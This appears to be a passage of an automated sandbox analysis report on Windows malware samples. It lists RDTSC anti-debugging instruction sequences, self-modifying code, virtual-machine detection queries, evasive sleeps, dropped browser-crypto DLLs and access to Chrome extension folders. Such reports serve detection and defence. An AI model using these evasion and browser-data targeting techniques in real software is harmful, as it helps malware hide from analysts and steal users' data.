Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50D09 second address: 4C50D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF698E1E1AFh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50D24 second address: 4C50D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50D41 second address: 4C50D66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF698E1E1ADh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50D66 second address: 4C50DAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FF698BF10D3h 0x0000000b or ax, 06EEh 0x00000010 jmp 00007FF698BF10D9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esp, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edx, 53B3944Eh 0x00000023 mov si, di 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50DAF second address: 4C50DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50DB5 second address: 4C50DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50DB9 second address: 4C50DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF698E1E1B5h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50DD9 second address: 4C50DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50DDF second address: 4C50DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50DE3 second address: 4C50DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60E96 second address: 4C60E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60E9C second address: 4C60EA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60EA2 second address: 4C60EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60EA6 second address: 4C60EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60EAA second address: 4C60EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FF698E1E1ABh 0x00000010 call 00007FF698E1E1B8h 0x00000015 pop esi 0x00000016 popad 0x00000017 mov esi, edi 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60EE4 second address: 4C60EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60EFA second address: 4C60F02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60F02 second address: 4C60F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF698BF10D4h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60F21 second address: 4C60F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60F27 second address: 4C60F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60F2B second address: 4C60F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60B76 second address: 4C60B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60B7A second address: 4C60B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60B80 second address: 4C60B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10D2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60B96 second address: 4C60B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60B9A second address: 4C60BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ebx, 02237CF0h 0x0000000f pushfd 0x00000010 jmp 00007FF698BF10D9h 0x00000015 or ecx, 05AB5A76h 0x0000001b jmp 00007FF698BF10D1h 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx ebx, cx 0x0000002a mov ebx, ecx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C60BE7 second address: 4C60C4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF698E1E1B7h 0x00000009 and si, B05Eh 0x0000000e jmp 00007FF698E1E1B9h 0x00000013 popfd 0x00000014 jmp 00007FF698E1E1B0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF698E1E1B7h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CD001B second address: 4CD006E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007FF698BF10D9h 0x00000015 xor cl, 00000026h 0x00000018 jmp 00007FF698BF10D1h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CD006E second address: 4CD0074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CD0074 second address: 4CD00CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF698BF10CFh 0x00000013 and eax, 13AA320Eh 0x00000019 jmp 00007FF698BF10D9h 0x0000001e popfd 0x0000001f movzx eax, di 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CD00CA second address: 4CD00CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CD00CE second address: 4CD00D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CD00D2 second address: 4CD00D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CD00D8 second address: 4CD0119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dh, 77h 0x00000010 pushfd 0x00000011 jmp 00007FF698BF10CCh 0x00000016 sbb si, 9618h 0x0000001b jmp 00007FF698BF10CBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CD0119 second address: 4CD016F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF698E1E1AFh 0x00000009 xor eax, 3C42EADEh 0x0000000f jmp 00007FF698E1E1B9h 0x00000014 popfd 0x00000015 mov si, 21A7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF698E1E1B9h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CC0EDA second address: 4CC0EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CC0EE0 second address: 4CC0EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CC0EE6 second address: 4CC0EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C702C3 second address: 4C702D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1B1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CD03E0 second address: 4CD040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c jmp 00007FF698BF10D6h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CD040F second address: 4CD0413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CD0413 second address: 4CD0419 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61AD20 second address: 61AD5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF698E1E1B9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 617FD3 second address: 617FDD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF698BF10C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C80538 second address: 4C8054B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1AFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C8054B second address: 4C8054F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C8054F second address: 4C8055F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C8055F second address: 4C80565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Special instruction interceptor: First address: 45E72A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Special instruction interceptor: First address: 45E81A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Special instruction interceptor: First address: 633FE7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Special instruction interceptor: First address: 696C15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Special instruction interceptor: First address: 606F4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: A1E72A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: A1E81A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: BF3FE7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C56C15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: BC6F4D instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Code function: 10_2_04CD0ADC rdtsc 10_2_04CD0ADC
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1694 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2384 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 4121 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 408 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 4126 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Window / User API: threadDelayed 700 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 3852 Thread sleep count: 70 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2324 Thread sleep count: 42 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2324 Thread sleep time: -42000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2420 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2420 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1132 Thread sleep count: 70 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1132 Thread sleep time: -140070s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3756 Thread sleep count: 69 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3756 Thread sleep time: -138069s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3164 Thread sleep count: 65 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3164 Thread sleep time: -130065s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1476 Thread sleep count: 4121 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1476 Thread sleep time: -8246121s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2548 Thread sleep count: 408 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2548 Thread sleep time: -12240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2716 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1476 Thread sleep count: 126 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1476 Thread sleep time: -252126s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1212 Thread sleep count: 4126 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1212 Thread sleep time: -8256126s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe TID: 6972 Thread sleep count: 700 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C9CC930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: KJEBKJDA.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: KJEBKJDA.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
